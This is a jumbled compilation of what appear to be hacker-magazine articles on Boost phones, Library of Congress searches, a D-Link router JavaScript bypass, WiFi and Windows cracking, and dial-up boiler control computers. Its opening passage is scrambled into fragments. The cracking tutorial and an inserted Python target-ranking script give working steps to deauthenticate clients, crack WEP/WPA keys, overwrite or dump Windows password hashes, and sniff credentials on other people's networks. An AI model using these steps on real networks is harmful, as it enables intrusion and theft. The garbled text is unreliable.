While users can place outbound calls from within a data session.VOLUME 26
Boost is capable of sending and receiving SMS and MMS messages. MMS is more commonly used for picture and video messaging on other carriers. As is the case with most data protocols. Although many handsets sold on the Nextel and Boost networks are wIDEN-capable. there is no billing for data usage.
References
Shout-Outs
.com ➥/iden/support/downloads/Motorola ➥_End_User_Driver_Installation ➥_2. but you cannot join them. have you heard of Toorcamp? Come to the Pacific Northwest over the 4th of July weekend and be part of the first ever full scale hacker camp in North America. I’m finished here at the Westin Building. Telephone service on Boost has some unusual features and limitations for wireless carriers in general. and then set up a dial-up connection with the telephone number “S=#777” (leaving the username and password blank). And Boost offers a rich and full featured call forwarding option. Text messaging is also distinctive on Boost. they canceled the upgrade project in mid 2008 and disabled wIDEN. the organizers are planning a hacker extravaganza of art. Call waiting is. it’s always phun seeing Portland phriends! Keep exploring. and it’s even possible to social engineer Boost customer service into performing an ESN change to a Sprint CDMA handset or PDA. If you are still able to find a Boost CDMA handset. but three-way calling is not. Although three-way calling isn’t available.motorola. but especially prepaid carriers. This results in some incompatibilities.0. Sprint launched a Boost product on the CDMA network. cool hacks. particularly with short codes. http://www.

Me neither. The “Library Catalogs” link at the top is very useful for finding documents that you need/want to request. but not required. so you aren’t able to go all the way to the Library of Congress and spend a bunch of time searching through it. however. The Library of Congress is a great place to look for things.
. No. things work very differently within the Library of Congress than anywhere else. as well as the real deal surrounding all the old hoopla of Area 51. Shouts to my wife. but don’t count on the librarians knowing everything in the library. One of the most useful ways to go about it is the link at the top of the page that says “Digital Collections. with something that might be useful to everyone. On this page there is also quite a bit of help about using the Library of Congress search engine and I strongly recommend at least perusing it. If they aren’t. Even though we know that there is. until next time. considering the nature of the information. you can request specific documents to be put up or sent to you. though.THE HACKER DIGEST . You also really need to know exactly what you are looking for. So be a bit careful when using this feature (even though we know the documents are there). and so forth. They are only required when requesting specific documents that are not online.gov/! At this website you can look up the many declassified documents already online. so you can choose which one you need. especially the arcane nature in which everything is organized. The pros and cons are right there in the descriptions. I will not say. have fun. As for what these documents hold. it wasn’t a weather balloon. There are time limits on how long documents can be classified.” Once there. one of which says “Ask A Librarian. It does take a bit of getting used to.” Of course there is a better way: http://www. On the left are several more links. There is a basic search and a guided search. because. but don’t know where to find them. I will say the documents are there. You have to have something to learn. “there has to be another way. For the most part. If you do it correctly. they don’t respond well to people who sound like they are conspiracy theorists. that being said.loc. and you know what you are looking for. 
Including old documents regarding the protocols of potentially interacting with “Non Terrestrial Beings.VOLUME 26
Finding Information in the Library of Congress
by Fantacmet
Greetings fellow phreaks and hackers. because I have seen them and I have found them most interesting. Fantacmet here. I’m sure some of you have heard that there have been documents that have been declassified. I’m out of here. at least as far as non-military agencies go. asking about the declassified records of the CIA regarding the Kennedy Assassination will probably get you ignored as a moronic conspiracy theorist and/or have them telling you that there is no such thing. (especially in the past several years) these limitations are being enforced and documents are being declassified.” Well. and LinuxHologram. Ok. my two kids. So you’re thinking. Keep it real and. Specific document numbers are helpful. you can find the documents regarding the Kennedy Assassination. although these are sometimes ignored and scheduled for declassification at a much later date in order to prevent public opinion from swaying on a particular person or subject. I’m not gonna give away all the secrets. Especially if you are a conspiracy theorist. you are presented with several categories from which to choose. The answer is simple: the Library of Congress. For instance.” This could be useful. even if you are a search engine expert.

} As you can see. (Remember. and maybe get a free router out of it! A year later. So I searched the HTML for “send_ request”. form1. WPA-PSK. About a year ago.submit()). “[object HTMLSelectElement]”! I went a step further and typed: javascript:alert(document.value). by disabling SSID broadcast and allowing only our two MAC addresses to connect. but D-Link practically disavowed the existence of this thing.value = “1”. so I glossed right over it. Now the dialog box returned “3”. Aha! The webpage changed.” or something stupid like that. but what does that mean? A quick google search told me that selectedIndex is the index of the value a drop down menu has chosen. so good. A dialog box popped up and behold. 15 seconds later. (There’s not much traffic on our street – still not forgivable. The DI-524. I noticed that when I hovered the cursor over the “Apply” button. “TWO-FO”. Therefore. and it turned out that it confirmed that you retyped your passphrase correctly. and found this was the ONLY reference to check_key()! Way to go D-Link! That would certainly explain why the authentication failed.THE HACKER DIGEST . if(auth. then made the value of “apply” true. it showed me that all was well! I overcame D-Link’s idiocy and have a working.getElem ➥entyById(“apply”). (In hindsight. I bought the D-Link DI-524 wireless router from Best Buy for about $15.selectedIndex == 0){ return true. stas. cheap garbage that it was. which also gives me a happy wife! Shoutouts to the Revolution. The most they could give me was an emulator for the interface. s e l e c t e dIndex).submit(). angelsteed. I use Iceweasel (pronounced “Firefox”). suncrushr.. was the “3” it referred to. I actually looked over the code. Finally. Connection refused. So far. I decided to take the time to figure this out. which confirmed that I had what appeared to be the latest firmware.. I figured that was a steal I couldn’t pass up! It even came with a USB adapter! 
I could resell the adapter.get ➥E l e m e n t B y I d ( “ a u t h ” ) . I Ctrl-F’d for precheck_key():
function precheck_key(){
  var auth = get_by_id("auth");
  if(auth.selectedIndex == 0){
    return true;
  } else{
    return check_key();
  }
}

along with my mess. I didn’t have that many clues.) So then the if/then/else clause runs check_key().) I sat next to our TV wired. Ctrl-F’d through the source code. I set the value: javascript:alert(document.getElementById(“auth”)). and so I mustn’t change it. because my old WiFi card couldn’t connect to a non-broadcast signal. so I typed this into the location bar on Iceweasel: javascript:alert(document. SSH? No. since it wouldn’t work in Linux anyway.
I ventured a guess that the function get_by_ id() was a nice way to call document. Thus. because Javascript sucks for debugging and D-Link wasn’t very forthcoming with error messages.value = 1) and typed in that previous step again to confirm that I actually did reset the value. and saw that the fourth option. was configured through the web browser. 0 is 1 and 3 is 4. However. I discovered exactly why the router was so cheap: the web interface refused to encrypt my wireless connection! That’s a very important feature D-Link neglected to enable! So I tried telnetting in. phalkon13. Here’s what I got: function send_request(){ if (precheck_key() && check_ ➥wpa()){ get_by_id(“apply”).VOLUME 26
Hacking the DI-524 Interface
by der_m
Here’s an example of the practicality of the hacking mindset. out of the living room. So for about a month I secured my wife’s wireless through obscurity alone. abbot. and submitted the form.. } else{ return check_key(). encrypted. The dialog box popped up “0”.. It’s easy to forget that 90% of hacking is scratching your head in confusion and digging to find the answers to that confusion. I looked again at the webpage. like most modern routers. send_request() confirmed precheck_key() and check_wpa() both returned true. indicating the router was restarting. ziddar. either precheck_ key() or check_wpa() was messing something up. nocturn. I typed: javascript:alert(form1. and weren’t using “1234. wireless router! I now connect happily to a broadcast wireless connection through wicd and can keep my laptop. check_wpa() was about 40 lines of code.) So. So I determined that all those checks could be bypassed and proceeded to the “then” clause of the send_request() function to see if I could manually do it. my status bar said “javascript:send_ request()”.getElementById(). I checked for a firmware update. I typed into the location bar: javascript:alert(document. and my fellow sleeper agents.
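The author got encryption working by calling send_request() from the location bar, which shows that precheck_key() and check_wpa() were the only checks standing between the form and the firmware. The device side should never depend on those browser checks, and the following is an added example (not D-Link's firmware code, and the order of the security-mode menu is an assumption) of the re-validation a router's form handler should do regardless of what the client-side JavaScript did or did not run.

```javascript
// Added example (not D-Link's code): the server side of the form the article
// bypasses. precheck_key()/check_wpa() run in the browser, so a javascript: URL
// can skip them; the device must re-check the submitted fields itself.
// The menu order below is assumed, not taken from the DI-524.

const AUTH_MODES = ["disabled", "wep", "wpa-psk", "wpa2-psk"];

const isHex = (s, len) => new RegExp(`^[0-9a-fA-F]{${len}}$`).test(s);
const isPrintableAscii = (s) => /^[\x20-\x7e]+$/.test(s);

// Validate exactly what was submitted; ignore the client's "apply" flag and
// never assume the browser-side checks ran.
function validateWirelessSettings(fields) {
  const errors = [];
  const idx = Number(fields.auth);
  if (!Number.isInteger(idx) || idx < 0 || idx >= AUTH_MODES.length) {
    return { ok: false, mode: null, errors: [`auth: unknown mode index ${fields.auth}`] };
  }
  const mode = AUTH_MODES[idx];
  const key = fields.key ?? "";

  if (mode === "wpa-psk" || mode === "wpa2-psk") {
    // IEEE 802.11i: a passphrase of 8-63 printable ASCII characters,
    // or the raw 256-bit PSK written as 64 hex digits.
    const okPassphrase = key.length >= 8 && key.length <= 63 && isPrintableAscii(key);
    if (!okPassphrase && !isHex(key, 64)) {
      errors.push("key: WPA passphrase must be 8-63 printable ASCII characters or 64 hex digits");
    }
    // This is what the page's check_key() verified in the browser only.
    if (key !== (fields.key_confirm ?? "")) errors.push("key_confirm: passphrases do not match");
  } else if (mode === "wep") {
    // WEP-40 is 5 ASCII / 10 hex characters, WEP-104 is 13 ASCII / 26 hex.
    const okWep = isHex(key, 10) || isHex(key, 26) ||
      ((key.length === 5 || key.length === 13) && isPrintableAscii(key));
    if (!okWep) errors.push("key: WEP key must be 5 or 13 ASCII characters, or 10 or 26 hex digits");
  }
  return { ok: errors.length === 0, mode, errors };
}

// The "Apply" handler: validate first, commit only on success, report errors otherwise.
function applyWirelessSettings(fields, commit) {
  const result = validateWirelessSettings(fields);
  if (result.ok) commit({ mode: result.mode, key: fields.key ?? "" });
  return result;
}

// Sample submission (constructed) as a client that skipped precheck_key() would send it.
const submitted = { auth: "3", key: "correct horse battery", key_confirm: "correct horse battery", apply: "1" };
console.log(applyWirelessSettings(submitted, (s) => console.log("committed", s.mode)).ok); // true
console.log(validateWirelessSettings({ auth: "2", key: "short", key_confirm: "short" }).errors);
```

With validation on the device, a broken or bypassed precheck_key() changes nothing: a well-formed submission is applied and a malformed one is rejected with a message, which is also the error reporting the author notes D-Link's interface lacked.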

so there is no need to use ipwraw). You also need the ability to do packet injection. that wiki has plenty of information on the tools included.org/) to check out the hardware compatibility list (HCL) to see if your machine and WiFi card are compatible. the ath9k driver creates mon0). this particular driver has been patched. navigate to /boot folder on the USB drive and run bootinst. as it’s often rebranded.VOLUME 26
Simple How-to on Wireless and Windows Cracking
by KES
You’ve heard the story a dozen times: someone’s on their morning commute from the bedroom to the basement office.remote-exploit. before BackTrack really boots. In my machine. Now you should be ready to proceed to the next step. and many just need a new driver (discussed later here. and then (feel free to replace 00:11:22:33:44:55 with another option if you like):
airmon-ng stop wifi0
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
Another note about drivers: some drivers create a new interface when airmon-ng start takes place.org). you can test by typing iwconfig and looking at the MODE. and then select the USB drive).com/ 4. a little bit of careful planning can make that a problem of that past. ➥isobuster. you’ll have the opportunity to choose a graphics option.html 3. The .iso is almost 800MB.THE HACKER DIGEST .. a beta version of BT4 has recently been made available) 1. and may create a new interface (for instance. Download isobuster at: http://www. but it’s not a sure bet just how to tell your machine to boot it. Find a USB drive. my adapter is wifi0 (which I use throughout the remainder of the instructions). I’ll give two examples here that I’ve seen personally and there is a ton of information on the web.iso. ends up bouncing down the stairs on their head and. voila. break the WiFi keys. choose a network you’d like to use.org/backtrack ➥_download. “ipconfig /all” tells me so) so. some machines will try booting from the USB automatically. which basically does it all for you (no #4. The first step is to build a bootable USB drive with the Backtrack distro. If your existing card is not. Easy.5) Now your bootable USB is ready to go. It should be in Monitor instead of Managed. then F12 to choose a boot device. type lspci and it will tell you what the hardware is. to change my driver (if you are using the BT4-beta. for him. but you may want some extra space 2. Download the USB . If you’re having a hard time figuring out what WiFi card you really have. and copy the / boot and /BT folders to the USB drive 5.bat 3-alt) Use a tool such as unetbootin. You can also watch the association list at the bottom of the page to see which APs
. however. Before reading this. so I’ll leave this part to you: I have the Intel Pro Wireless 3945 WiFi adapter in my machine (at a command prompt in windows. right? And now. If this occurs after airmon-ng start. and use some information gathering tools to recall what’s going on.. Lastly.. so a 1GB drive would work. identifying and cracking the WiFi network(s).. the process is:
BackTrack USB Boot Disk
Once you think you have the right driver in place. depending on which WiFi card you have. open the . you may have to utilize a new driver. my friend’s was ath0. I type:
modprobe -r iwl3945
modprobe ipwraw
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up
My friend has a MacBook Pro (Atheros 5418 WiFi) and. it is well worth your time to visit the Backtrack wiki page (http://wiki. Once Backtrack is loaded. they just can’t seem to remember the password to their computer.. you’ll need to do the following:
ifconfig mon0 down
macchanger --mac 00:11:22:33:44:55 mon0
ifconfig mon0 up
And then substitute the new interface in all subsequent instructions. or to their wireless network. First. we’re going to change our MAC address for a little privacy. This is also where you would implement any special boot instructions found on the HCL mentioned earlier (you hit tab to enter them). some of which are touched on later.. The command iwconfig will show you which yours is. ➥remote-exploit. we have to take a peek at what networks are up in the area:
airodump-ng wifi0
If you’d like to focus on the “low hanging fruit” you can use:
airodump-ng –t WEP wifi0
Now. but it seems many of the drivers enable both features. open an xterm window by typing xterm into the small text box to the right of the menu buttons. But before that happens to you (again?). Also. a process that is very quick and easy (this tutorial was written when BT3 was the most current. Looks like they need a way to access the locked computer. Also. I typically watch the DATA column to see which have activity. there are tons that are.iso at: http://www. For instance.remote➥exploit. Using isobuster. while with others you must interrupt the standard loading (I am on a Lenovo R61 so I have to hit the blue “ThinkVantage” button. Now. That is why you’re reading this. doesn’t see that empty beer/ Red Bull on the steps. right? You wouldn’t be doing any of this on anything but your own personal computer and personal network. and at length on the BT forums at http://forums.

If it has captured a handshake. It also has the ability to perform a Man in the Middle attack. Now. This focuses airodump to just gather information on that channel.cap
WEP Cracking
where [essid] is the name of the network. It monitors network traffic and grabs usernames.oxid. If there’s no one there. with different themes and so on. So. etc. This is my personal choice. jump ahead. aircrack will try again. service type. elapsed time. you can surely find what you need (except for Nessus and Cain & Abel). To do this. [filename] is of your choosing. Metasploit Framework (http://www. you have to use a wordlist to crack it. just leave it be. keep reading. If you’re having problems. you can shut down. Very easy to use.org/. Stop airodump (Ctrl-C) and restart as follows:
airodump-ng -c [channel] -w ➥ [filename] -bssid [bssid] wifi0
Where [channel] is from the CH column. Now that you have opened an airodump window for the network you’re targeting. You can either download this to your machine before booting to BackTrack or. Once you have your handshake. so open a third xterm window. and it even has a default scan profile (or you can make your own). and then flood the network with data to enable key cracking.. enabling you to grab https data. to generate the data:
aireplay-ng -3 -b [bssid] -h ➥ 00:11:22:33:44:55 wifi0
If you look at the airodump window you left running. Cain & Abel (http://www. but only because I got used to this toolbox. time. and enter:
aircrack-ng -b [bssid] [filename]-01.txt] ➥ -b [bssid] [filename]-01. Nessus (http://www. Cain has tons of other features. date. When the DATA column hits each increment of 5000. You want
59
. Alternatively. So now you can a) wait. reboot in Windows. Now we need to associate with the network of interest. It will then indicate which hosts have which weaknesses/unpatched holes. or b) if there are clients. you can change the 1 to more (5. This is an ideal partner tool for Nessus. ➥cap
It will test the data gathered to that point and. then you’ve come at a bad time. this is going to take some time. there will also be: [WPA handshake: [bssid] You’ll see the client MAC(s) in the Station list at the bottom of the airodump window. First. you may have to try a few times (or other times of day). but there is an easy command line interface as well). just download one before changing drivers and such (which can interfere with typical Internet access). and enter:
aireplay-ng -0 1 -a [bssid] ➥ -c [client MAC] wifi0
WPA Cracking
This will send one de-authenticate packet to the client. and VOIP calls. open a new xterm window. but increment slowly.. If this is successful. you should now see the DATA column growing like the national debt.nessus. and other items that would otherwise be missed. kick someone off the network to force them to re-authenticate. double click and choose your payload (what you want to do on the target machine. if you prefer. ➥aircrack-ng. you have to capture the handshake that is generated when a valid user joins the network. you’ll see the following:
Sending Authentication Request ➥ (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID:1)
Make sure you specify the path of the wordlist if it’s not in the same directory as the capture file. a lot of time. and use your favorite tools there. or navigate the exploit list that is organized by OS. The last step is to use this data to find the key. but we’re going to keep this section short since everyone has their own preferences. you can just identify which host(s) to scan. If you’re familiar with the options in BackTrack.THE HACKER DIGEST . battery life. if WPA/WPA2. which allows you to divert traffic between the clients you indicate (typically a client and the router) through you. assuming you have one:
aircrack-ng -w [wordlist.org/) This is a great program that tests hosts on the network for known vulnerabilities. Unlike the ten minutes you would spend on WEP. open another xterm window and enter:
aireplay-ng -1 0 -a [bssid] -h ➥ 00:11:22:33:44:55 -e [essid] wifi0
the de-auth/re-auth process to be smooth for the client.000-40. Eventually (typically in the 10. or try moving around a bit if you only have one network of interest.com/) This one is available in BackTrack.VOLUME 26
have clients (aka stations) attached. 10). etc.metasploit. you have plenty of tools in BackTrack 3 to toy with to your heart’s content. from the network you specified. There are many wordlists available online. and [bssid] is the bssid of the network you’re interested in.it/) This program is perfect to just leave running all the time. Once you find one you like. passwords.cap If the network is WEP protected. So now that you have access to all of the networks in the area. The top line of the airodump window has information such as channel. and copy the results to a file called [filename]-01. there is a troubleshooting guide at http://www. If you like. After you get a sense of potential vulnerabilities in Nessus (or use nmap to see which ports are open) you simply load Metasploit (I use the GUI.000 range) you’ll get your key. if it does not find the key. or other networks. such as reverse VNC to have a firewalled machine connect back to you and provide you with the user’s desktop) and then input any other
Next Steps
If this doesn’t work. You can then use the search for whichever terms/ports you want. etc. but also has a Windows version.

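Stepping back to the target-selection step of the airodump-ng section: the -w [filename] run also writes a [filename]-01.csv beside the .cap, and the "low hanging fruit", DATA column and station-list checks the text describes by eye can be applied to that file. The following is an added example, not code from the original article: it parses a constructed airodump-ng CSV (sample data, not a real capture), ranks WEP networks first, then by captured data frames and associated stations, and states what the article's rules of thumb say to do next. The interface name wifi0 and the 10,000-IV threshold are taken from the text; the ranking order is my own choice.

```python
"""Rank targets from an airodump-ng CSV dump the way the article does by eye.

Added example, not from the original article. The CSV below is constructed
sample data in the airodump-ng CSV layout (an access-point table, a blank
line, then a station table). "# IV" is what the live display calls DATA.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2009-06-24 12:00:00, 2009-06-24 12:10:00,  6,  54, WEP , WEP, OPN,  -60,  200,  5120,   0.  0.  0.  0,  6, myhome, 
00:11:22:AA:BB:02, 2009-06-24 12:00:00, 2009-06-24 12:10:00, 11,  54, WPA2, CCMP, PSK,  -70,  150,     0,   0.  0.  0.  0,  7, office1, 
00:11:22:AA:BB:03, 2009-06-24 12:00:00, 2009-06-24 12:10:00,  1,  54, WEP , WEP, OPN,  -85,   50,    12,   0.  0.  0.  0,  5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2009-06-24 12:01:00, 2009-06-24 12:09:00,  -50,  300, 00:11:22:AA:BB:01, myhome
AA:BB:CC:00:00:02, 2009-06-24 12:02:00, 2009-06-24 12:09:00,  -55,   40, 00:11:22:AA:BB:02, 
AA:BB:CC:00:00:03, 2009-06-24 12:02:00, 2009-06-24 12:09:00,  -55,   40, (not associated), office1
"""

WEP_IV_TARGET = 10_000  # low end of the 10,000-40,000 IV range the article cites


def parse_airodump_csv(text):
    """Return {bssid: ap} with channel, privacy, data (IV) count, essid and stations."""
    split = text.find("Station MAC")
    ap_part, sta_part = text[:split], text[split:]
    aps = {}
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":
            continue  # header or blank line
        aps[row[0]] = {
            "bssid": row[0], "channel": int(row[3]), "privacy": row[5].strip(),
            "power": int(row[8]), "data": int(row[10]), "essid": row[13].strip(),
            "stations": [],
        }
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) < 6 or row[0] == "Station MAC":
            continue
        ap = aps.get(row[5].strip())  # "(not associated)" never matches an AP
        if ap is not None:
            ap["stations"].append(row[0])
    return aps


def rank_targets(aps):
    """WEP first (low hanging fruit), then most DATA, then most stations."""
    def key(ap):
        return (0 if "WEP" in ap["privacy"] else 1, -ap["data"], -len(ap["stations"]))
    return sorted(aps.values(), key=key)


def crack_readiness(ap):
    """(ready, reason) using the article's rules of thumb for WEP and WPA."""
    if ap["privacy"] == "OPN":
        return True, "open network, nothing to crack"
    if "WEP" in ap["privacy"]:
        if ap["data"] >= WEP_IV_TARGET:
            return True, "enough IVs captured, run aircrack-ng"
        return False, f"need about {WEP_IV_TARGET - ap['data']} more data frames (IVs)"
    if ap["stations"]:
        return True, f"deauth one of {len(ap['stations'])} station(s) to force a WPA handshake"
    return False, "no stations associated; wait for a client or come back later"


def focus_command(ap, iface="wifi0", prefix="dump"):
    """The focused airodump-ng line from the article, filled in for one target."""
    return f"airodump-ng -c {ap['channel']} -w {prefix} --bssid {ap['bssid']} {iface}"


if __name__ == "__main__":
    for ap in rank_targets(parse_airodump_csv(SAMPLE_CSV)):
        ready, why = crack_readiness(ap)
        print(f"{ap['essid']:10} {ap['privacy']:5} data={ap['data']:6} "
              f"stations={len(ap['stations'])} ready={ready}: {why}")
        print("   ", focus_command(ap))
```

Run it against a real [filename]-01.csv by reading the file into SAMPLE_CSV's place; the Privacy column can contain several tokens (for example both WPA2 and WPA), which is why the WEP test is a substring match.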
Wireshark (http://www.wireshark.org/) This is also in BackTrack or Windows and is a standard packet sniffer, so that you can see all of the activity on the network. I find it helpful to run this as well as Cain, just in case Cain grabs a password and, for some reason, not the username. You can then do a search in Wireshark for the password and find the missing data. It’s got an easy filter tool as well, so you can easily target just emails, IM activity, etc. You can also use Rainbow Tables in Cain, but I’ll leave that for another time.

Other Next Steps

So, all of this is well and good but, if you’ve fallen down your stairs and lost your memory, you might need to figure out how to get into your computer in the first place! But luckily, by virtue of booting into an alternate OS (that being BackTrack instead of Windows), you now have access to the system security files of Windows and can recover, or rewrite, the password. Simply open an xterm window and type df, which will show you where the Windows system is (i.e. /mnt/hda1). Now just:

    cd /mnt/hda1/WINDOWS/system32/config
    ls    # (to make sure you see the files: SAM and system)

If you don’t care what the password is, and just want to overwrite it:

    chntpw -i SAM system

This will show you the users and ask which you’d like to overwrite. If you do care what the password is, and don’t want to change it (which would let the user know that the machine’s been compromised), you have a harder task ahead. After you’ve cd’d to the right folder (as above) and confirmed SAM and system are present:

    samdump2 -o hashes.txt system SAM

This creates a file hashes.txt in the directory you’re in. Copy this file to your USB, head back to your own machine (since this will take some time) and then choose an option:

1. Load the hashes into your new favorite program Cain. (Go to the Cracker tab at the top → choose LM&NTLM Hashes on the left → right-click in the body of the page → Add to List → import hashes from a text file → choose your hashes.txt.)
2. Similar to cracking WPA, boot into BackTrack and then crack with John the Ripper (and your handy dandy wordlist.txt from earlier):

    john --wordlist=wordlist.txt hashes.txt

Either will take awhile, but then you’ll have your password (assuming you have a good wordlist).

If You Can’t Stand the Heat, Hack the Computers! Understanding OAS Heat Computers

by The Philosopher

It is a rare technology indeed that continues to be accessed by dial-up modem, and one of the still scarcer categories of those that do not immediately require a password, and yet carries a great deal of significance in the aspect of life administered thereby. Heat computers and monitoring/building automation systems of all types comprise one of the few remaining classifications of machines that may still be accessible via phone lines, in addition to DSL and other venues. Such systems do exist, although they are usually discovered by the oldest and most primitive of processes–the few systems with so little security and so much importance are thus often overlooked and underrated in a hacker culture increasingly geared towards discovery of the cutting-edge. It is simply astonishing what wardialing is still capable of revealing–a technique that has unfortunately lost most of its popularity in the underground, surviving now primarily as a pastime for casual phreaks, who more often than not do it by hand in search of nothing so glamorous or useful as modem carriers to computer systems, a practice usually called ‘hand scanning’ or simply ‘scanning’.

From these computers, the temperature of water in the boiler, cutoff temperatures at which the OAS will cease to heat the building, burner attributes, and more may be controlled–these systems are designed to manipulate and monitor the entire scope of processes involved in space heating. As might be expected, these attributes, when exploited clandestinely, provide the potential for some extremely outlandish hijinx, some of the only things possible that even begin to compare with the pranks portrayed in the film Hackers (with regard to physical manipulation of buildings remotely). Brief, minimal explanations of boiler operation and water heating are necessitated by the subject matter of this article and will be provided in due course; interested readers are urged to research boiler operation and water heating more extensively. The extent of my knowledge regarding said systems shall be detailed only with respect to specific models of OAS heat computers (the one examined here drops one to a command prompt immediately upon connection); the similarities of their operation would suggest that other brands and versions function in a similar fashion so as to ensure the usefulness of the information within this article
in the instance that one should encounter one other than those specified here.

Current Report

As was mentioned previously, the OAS Heat Computer (version 6310, in the following captures) is an attractive target for exploration as it is accessible remotely over a modem (and, in the case of later models, DSL over static IP) connection, provides a plethora of information regarding the boilers under its control to anyone who calls without supplying security credentials (although a password is necessary for programming) and renders possible technology tasks that formerly required access to a thermostat or boiler room. Said modem connection to the OAS requires 1200 baud and a 7.E.1 terminal emulation (7 data bits, even parity, one stop bit). Upon connection, a banner similar to the following will be displayed, concluding with a “MODE:” prompt:

    CONNECT 1200
    OAS Heat Computer
    124-5 & 328-12 WEST 12
    Tue Jun 24, 2008  12:49A
    MODE:

This will identify the time and date at the location of the unit and the address. Note that this is a street address in the format 124 West 12th St. (this unit has moved since this was set during the installation period, changed to preserve the identity of this particular system)–this is the format for New York City. Units in other locations may display it differently, and the address is obviously fictitious. OAS claims that these may span three locations–perhaps the 245 and 285 are located in two separate places. “MODE:” prompts the user to enter a command. Typing a question mark will result in the following helpful explanation providing a list of commands and keys that will be used during the session:

    MODE: ?
    COMMANDS:
    R = CURRENT REPORT
    S = SET POINTS
    P = PROGRAMMING (ALSO P1,P2,P3,P4)
    T1,T2,T3 = HOURLY TEMPERATURE RECORDS
    E = EVENTS
    H = DAILY HISTORY (HA,HB = THE TWO PARTS SEPARATELY)
    W1,W2,W3 = WATER RECORDS
    D1,D2,D3 = T1,T2,T3 + E + H + W1,W2,W3
    XD1,XD2,XD3 = MORE HOURLY RECORDS
    L = LOGON MESSAGE (ADDRESS AND DATE)
    V = VERSION (MODEL NUMBER, DATE AND NOTES)
    SPECIAL KEYS:
    <?> = HELP
    <CTRL-C>, <ESC> = ABORT CURRENT MODE
    <CTRL-S> = PAUSE TRANSMISSION
    <CTRL-Q> = RESUME TRANSMISSION
    <BACKSPACE> = DELETE LINE

The descriptions of commands are fairly cryptic, as the OAS assumes that one is familiar with its administration. I shall elaborate: “R” will print a report of the temperatures of water in various sections of the boiler as well as their status, as seen below (note that commands must be entered in all caps):

    MODE: R
    __TIME_245A_245B_245C_245D_285A_285B_285C_285D____9___10__OUT__AQS__DHW_CHW_STK
    12:49A   77   80   82   78   80   74   82   83  <5*  <5*|  68  194  117  >>>  136
    OFF(B) AUT(K) WINTER
    _BURNER__HEAT___BYP___MAL___BAT__HI__LO_
      0:03   0:00   0:00   0:00   0:00  71  68   0
    __H-A__H-W__L-W__H-S_____WTR_
      198  128  113  656    0

TIME is self-explanatory–the time of access. 245A through 285D signify the eight thermistor sensor inputs of the computer (thermistor=thermal resistor: a resistor that varies in electrical resistance with heat), with the values underneath them denoting the temperature at each corresponding location. _9 and _10 are two additional sensors that report apartment or outside temperatures. A “<5*” is indicative of an electrical break/open connection or indeed a temperature below 5 degrees F. Obviously the former is true in the case of this building, since it was accessed in June, and other reported temperature values are not within even remote proximity to 5 degrees or less. OUT is the sensor input for outside air; 68 is the temperature outside at the time of access. AQS stands for aquastat; this value represents the temperature of the water in the boiler. “DHW” and “CHW” are acronyms for domestic hot water and coil hot water, respectively, representing the temperature of hot water when “called” domestically and in the coil. To make this distinction, the term “domestic hot water” or DHW refers, at least, to potable water used for functions other than space heating, i.e. water of sufficient quality for human consumption (regardless of actual usage) that is not used to heat a building. Examples include tap water used for showering/bathing, drinking, cooking, cleaning, etc. The latter value, though, is necessary to monitor since debris may collect on the outer coil and absorb heat, thereby lowering the temperature of the water as it travels through the boiler, thus wasting fuel as more is required to achieve the requested temperature. The significance of the arrows seen underneath CHW is that of a “probable electrical open” as according to the electronic manual for the OAS Heat Computer 1000 (the likes of which is packaged with software that will be discussed in the latter half of this article). Usually, a numerical temperature value will be displayed here. STK represents the temperature of the stack (also commonly referred to as a chimney) of the boiler.

“OFF(B)” reports the status of the burner as off, and “AUT(K)” the status of the key switch in automatic position. This key switch serves as a venue to control the most fundamental functions of the heat computer manually and locally–if in the ON position, it activates the burner in a manual bypass, in the absence of a heat call. If in the OFF position, the burner will be switched off and remain unresponsive to heat calls. In automatic position, the burner will activate/deactivate appropriately depending upon the presence of system heat calls. “Heat call” is simply the term for a request, for heat, either automatic/digital (the temperature may drop below the programmed threshold, necessitating heat) or manual. Calls may also occur for domestic hot water. Hydronic systems may exhibit “ON(C)” or “OFF(C)”, which report the status of the circulator pump as on or off. The differentiation between hydronic and steam boilers will be made throughout the current report analysis as the OAS Heat Computer handles each respective type of system slightly differently. Hydronic boilers heat fluid, usually water, to a specific temperature and heat a space through the circulation of that hot water or fluid. The circulation pump serves the specific function of returning water to the boiler once its heat has been largely dissipated. Notice that the burner is in winter mode, an unusual condition for a system accessed in June. Summer and winter modes differentiate in that the heat computer will cease to actively provide heat when it is set to the former option, although domestic hot water will be provided still, and winter mode is that at which the computer will provide heat and function ordinarily. Altering the mode from winter to summer and vice versa is one of the programmable set points of the system, as will be seen anon. Also on this line may be commonly printed an indication of a domestic hot water call, if one is present, the likes of which is printed here and logged as an event in the records viewable by the ‘E’ command. Following CHW, it could be alternately seen as:

    OFF(B) AUT(K) WINTER DHWTR

Furthermore, all of the dial-out alarm conditions described below may appear on this line of the report, in addition to OVRD (programmed override) and BAT, which indicates that the system is currently operating on battery backup.

The next line reports the burner run time, heat time, bypass, malfunction, and high/low outside temperatures for the past 14 days. As can be concluded from a brief analysis, the burner has been running for three minutes at the time of access, and no malfunctions or bypasses have occurred. HEAT, or heat time, displays the burner run time during heat calls (an instance of heat being turned off or on is referred to as a heat call, as noted above). Underneath BYP, system bypass, is placed the burner run time during a period in which the burner is active yet no heat or DHW calls are present. Bypasses will trigger the bypass alarm (see below), and may occur when the key switch has been manually set to the ON position, or if the burner has been physically controlled from the burner panel located on the heat computer system itself. In order to understand the significance of the time value under MAL, one must understand the method by which the heat computer defines and manages ‘malfunctions’. In order to properly operate the burner as corresponds to heat calls, when the key switch is in automatic position, the OAS Heat Computer temporarily records through its circuitry the burner status. If a delay in excess of 45 minutes is reported between a call for heat or DHW and the activation of the burner, a “timed malfunction” occurs. The “flame failure” circuit is that which will be interrupted if flame is not turned on when called for. The malfunction alarm is connected to this circuit and “listens” for flame failure. Timed and hardware malfunctions differentiate in that the latter is a failure of flame even when the burner has attempted to produce it, as opposed to timed malfunctions which are failures of the burner to activate at all; logging of this 